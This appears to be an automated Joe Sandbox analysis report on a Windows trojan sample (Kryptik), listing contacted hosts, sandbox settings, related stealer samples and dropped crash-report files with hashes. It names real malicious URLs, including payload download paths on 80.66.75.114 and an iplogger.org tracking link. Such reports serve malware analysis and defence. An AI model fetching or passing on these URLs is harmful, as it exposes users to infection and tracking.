                        https://iplogger.org/1Pz8p7SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098391293.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095635491.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2096994132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2102473420.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2098475766.0000000002FE2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2101179469.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2099803933.0000000003061000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalseunknown
                        http://80.66.75.114/files/downloadtem32SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmpfalseunknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        80.66.75.114
                        		unknownRussian Federation
                        		20803RISS-ASRUfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1528791
                        Start date and time:2024-10-08 10:07:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 57s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:25
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                        Detection:MAL
                        Classification:mal100.evad.winEXE@9/48@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 22
                        • Number of non-executed functions: 160
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.189.173.21
                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        80.66.75.114nRGKqzVQRt.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114/soft/download
                        BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114/soft/download
                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                        • 80.66.75.114/soft/download
                        univ.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114/soft/download
                        univ.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114/soft/download
                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                        • 80.66.75.114/dl?name=mixnine
                        file.exeGet hashmaliciousClipboard Hijacker, Cryptbot, Neoreklami, Socks5SystemzBrowse
                        • 80.66.75.114/dl?name=mixnine.exe
                        file.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114/soft/download
                        CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                        • 80.66.75.114/soft/download

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        RISS-ASRUnRGKqzVQRt.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114
                        BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114
                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                        • 80.66.75.114
                        univ.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114
                        univ.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114
                        file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                        • 80.66.75.114
                        file.exeGet hashmaliciousClipboard Hijacker, Cryptbot, Neoreklami, Socks5SystemzBrowse
                        • 80.66.75.114
                        file.exeGet hashmaliciousUnknownBrowse
                        • 80.66.75.114
                        CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                        • 80.66.75.114

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]nRGKqzVQRt.exeGet hashmaliciousUnknownBrowse
                          BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
                            file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                              univ.exeGet hashmaliciousUnknownBrowse
                                univ.exeGet hashmaliciousUnknownBrowse
                                  file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                    file.exeGet hashmaliciousUnknownBrowse
                                      CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                        SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exeGet hashmaliciousUnknownBrowse
                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]nRGKqzVQRt.exeGet hashmaliciousUnknownBrowse
                                            BDY5OFXpM9.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5SystemzBrowse
                                                univ.exeGet hashmaliciousUnknownBrowse
                                                  univ.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                        CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                                          SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exeGet hashmaliciousUnknownBrowse

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_3b1ee01e6e6a552eb3f6b99786c786b0c8ec181_3aafbe1c_31263007-c9a4-4dd8-88fe-277adad8ad29\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8738392677818466
                                                            Encrypted:false
                                                            SSDEEP:96:jcqm/wdzmOGkmefsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTfa:j/d7GofHY056rgjuizuiFKZ24IO8a
                                                            MD5:411303F86D7BC5E2814E02CAF9077DE2
                                                            SHA1:3894CD4D85C329BF1D1A576214A74C880F140A1C
                                                            SHA-256:9DDD8CC21825E7487D6B287042C15E891ED9316075E7E0BA695EB78C096E0A0F
                                                            SHA-512:3DA4F219DE2E3837ADCBCFCD02997A554309C66E5FD6D4AC23F73500664D16848E2893A89C0F0E27A70FB9E38062182C3EA38831AE899FA599DE6FBDF1AAC2E9
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.4.8.4.5.3.4.2.5.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.2.6.3.0.0.7.-.c.9.a.4.-.4.d.d.8.-.8.8.f.e.-.2.7.7.a.d.a.d.8.a.d.2.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.d.8.9.0.5.c.c.-.c.d.4.4.-.4.d.1.3.-.9.b.2.7.-.d.3.9.a.d.3.5.2.6.4.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_3b1ee01e6e6a552eb3f6b99786c786b0c8ec181_3aafbe1c_33a9eb5f-865c-4920-a1d4-504381002f3d\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.923570848410821
                                                            Encrypted:false
                                                            SSDEEP:96:nqOm/wdzmOGkmeismmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTfR:ntd7GoiHY056rgjuRzuiFKZ24IO8a
                                                            MD5:A6A6823942AD4CDCD3B630294DE91A62
                                                            SHA1:AB175106EFB8F69B779B4C3B4FA879A35C0367EA
                                                            SHA-256:DB0514614A2F146C089849F72AC8023A459DAB91B529D9FF399FE6208B6F41FF
                                                            SHA-512:C8C64D05DACA0ECBC5E7BBD603C0CF1AFBEC559B244B19552348B439AF962D1B6BAA91B70B4E902C13A83030B8C2D570FEB47681B848D82A9BB6ADDFDE24C902
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.4.8.7.7.1.3.5.0.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.a.9.e.b.5.f.-.8.6.5.c.-.4.9.2.0.-.a.1.d.4.-.5.0.4.3.8.1.0.0.2.f.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.5.b.7.d.5.f.-.a.1.c.7.-.4.b.4.f.-.9.8.7.4.-.2.c.4.c.5.0.c.0.6.5.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_3b1ee01e6e6a552eb3f6b99786c786b0c8ec181_3aafbe1c_6235f1a8-eaa3-4c7a-a937-e0178dcf0a3f\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8739199790953603
                                                            Encrypted:false
                                                            SSDEEP:96:jvmVm/wdzmOGkmeismmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTS:gd7GoiHY056rgjuizuiFKZ24IO8a
                                                            MD5:62C91A2FA8229F2DDC9D6EE0C737F8DF
                                                            SHA1:370963BF64443538F47E60AFE6BE2133F8F6FDF8
                                                            SHA-256:DF60A8364D8351D0349CC757EA515DD10C02AD3267FA5A3488ED6955F98E2D00
                                                            SHA-512:346E9377CFFD30ABE36CD0DAB1E660B685EEADFAE2BBB9579CA6CDBEABB468FA7E478C55B4D782446FED8ABBA779FDAD779D23424535E5D9A4FC67EF90E095AF
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.4.8.5.2.2.5.8.4.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.3.5.f.1.a.8.-.e.a.a.3.-.4.c.7.a.-.a.9.3.7.-.e.0.1.7.8.d.c.f.0.a.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.2.1.5.5.9.5.-.9.8.7.9.-.4.e.2.4.-.9.6.8.2.-.4.5.3.f.7.d.8.d.9.e.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_3b1ee01e6e6a552eb3f6b99786c786b0c8ec181_3aafbe1c_72469813-e283-4fce-8b45-4d1ed0110b0e\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8961390373245083
                                                            Encrypted:false
                                                            SSDEEP:96:nGVqPm/wdzmOGkmeVsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BR1:nBd7GoVHY056rgjuJzuiFKZ24IO8a
                                                            MD5:3CD5308E88B173A469F8E84528334C0C
                                                            SHA1:128734F4532C1F9700D5D1DBC23F2D53A0128067
                                                            SHA-256:5F87B81B39A68CCA453103638A01BDD0F911B3B8D53AC1A75162534A6C5C13D7
                                                            SHA-512:89C029B75BBA9649B97477144B30762304653ABAEB611785753F6F7906E471EF5CBB921AF7826D6D1CB48CB05779F43B568972820E23BA6BF3655D1277AEA0D6
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.4.8.7.0.0.3.8.3.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.4.6.9.8.1.3.-.e.2.8.3.-.4.f.c.e.-.8.b.4.5.-.4.d.1.e.d.0.1.1.0.b.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.e.3.8.d.3.7.-.1.a.1.6.-.4.b.d.5.-.a.8.1.e.-.a.4.7.b.8.e.3.f.8.a.0.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_3b1ee01e6e6a552eb3f6b99786c786b0c8ec181_3aafbe1c_e399e4df-df4b-402c-8d04-d827c46b0fdd\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.8742429027510149
                                                            Encrypted:false
                                                            SSDEEP:96:sX/DqXom/wdzmOGkmeqsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8m:iDfd7GoqHY056rgjuizuiFKZ24IO8a
                                                            MD5:F93C23B79F14AFABB289298306EA563E
                                                            SHA1:8FCF1F2908246045395CC558B7A35CE2D5E42C47
                                                            SHA-256:2253C4B982143456A0E470F9B85D13C70C5984F34476FE6EB8231599DD6F7212
                                                            SHA-512:EC5A9ADD1FC2A01EE540C8FD2974ACCD60F8227DC4CD6E4885CD09BC0ADF3D5C437428A4BB71D963DC1F917E3CE22169017D8023D8536B2690AA47B1E6E4B753
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.4.8.3.8.5.5.6.8.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.9.9.e.4.d.f.-.d.f.4.b.-.4.0.2.c.-.8.d.0.4.-.d.8.2.7.c.4.6.b.0.f.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.5.a.2.c.e.1.-.7.f.a.8.-.4.b.8.1.-.b.8.8.1.-.8.3.b.a.9.a.4.9.8.8.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_3b1ee01e6e6a552eb3f6b99786c786b0c8ec181_3aafbe1c_fd57a539-133a-4b4b-9e3d-23c4fb226572\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.874241010281355
                                                            Encrypted:false
                                                            SSDEEP:96:n/m/wdzmOGkmeHsmmRhqkoA7RT6tQXIDcQnc6rCcEhcw3rrmHmP+HbHg/8BRTf3K:Hd7GoHHY056rgjuizuiFKZ24IO8a
                                                            MD5:659BF0624083C4A1B22A320EC76929E0
                                                            SHA1:CB1B3911CEF94C208C3EB72D27101425D162385E
                                                            SHA-256:952C21E7DB5C8354A4D521986C858DDBE89BB776C22121B419449C8133125A55
                                                            SHA-512:392A918F69719F11F0265C7C8D97F08CA1F73860E8547BEDBEDAFF96396644D841D5283CF6293BB552EAD2473EB2DA932361AB168F5E8C5D641D09DEE0B1D9E3
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.4.8.6.3.9.2.7.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.5.7.a.5.3.9.-.1.3.3.a.-.4.b.4.b.-.9.e.3.d.-.2.3.c.4.f.b.2.2.6.5.7.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.7.7.3.e.e.4.-.0.3.3.7.-.4.5.9.d.-.9.9.3.1.-.3.0.7.7.6.6.c.8.f.b.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.5.d.4.7.1.7.5.3.5.e.6.4.6.3.2.0.6.f.9.7.5.!.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_4ae234de8f939132ac9416fcbaba6e3171b928a6_3aafbe1c_c0102fc4-fda2-4d08-8dc1-b11d28054b30\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.0221245844257116
                                                            Encrypted:false
                                                            SSDEEP:192:f2d7GoWHHU07cqbdjuQ90zuiFUZ24IO8n:OdSoWHHP7JbdjqzuiFUY4IO8n
                                                            MD5:BF5E6B0B6E3643A9D170F69666BE00F6
                                                            SHA1:6BF992BA1A647A2167568B342979300457A7DAE2
                                                            SHA-256:97EEB6526C254A142BDA2E050894ABBF623B107ECC29D65F8FD16C424DE1DBE5
                                                            SHA-512:FF2AC5E9B6A78B416233B39DFF95F6DC1505FCF418A6F09B7EE24D343E0B81D67F1471F64BB9A187744C93602FE7832EB1ED0633ADE2B64A8E0261242956D774
                                                            Malicious:false
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.4.8.5.7.2.3.6.6.7.7.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.4.8.5.7.3.1.7.9.2.6.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.1.0.2.f.c.4.-.f.d.a.2.-.4.d.0.8.-.8.d.c.1.-.b.1.1.d.2.8.0.5.4.b.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.c.5.d.9.e.a.-.9.4.2.8.-.4.5.d.d.-.9.6.2.0.-.2.6.d.2.7.d.5.b.7.a.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.3.2...K.r.y.p.t.i.k...L.K.E...g.e.n...E.l.d.o.r.a.d.o...1.7.6.4.1...1.7.6.7.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.0.-.0.0.0.1.-.0.0.1.4.-.a.4.a.b.-.d.a.2.f.5.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.2.a.a.2.4.2.4.b.3.b.f.a.1.f.c.2.c.4.9.2.b.2.9.9.e.0.1.e.5.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.8.b.a.4.5.0.6.c.d.b.7.8.6.f.c.0.b.1.

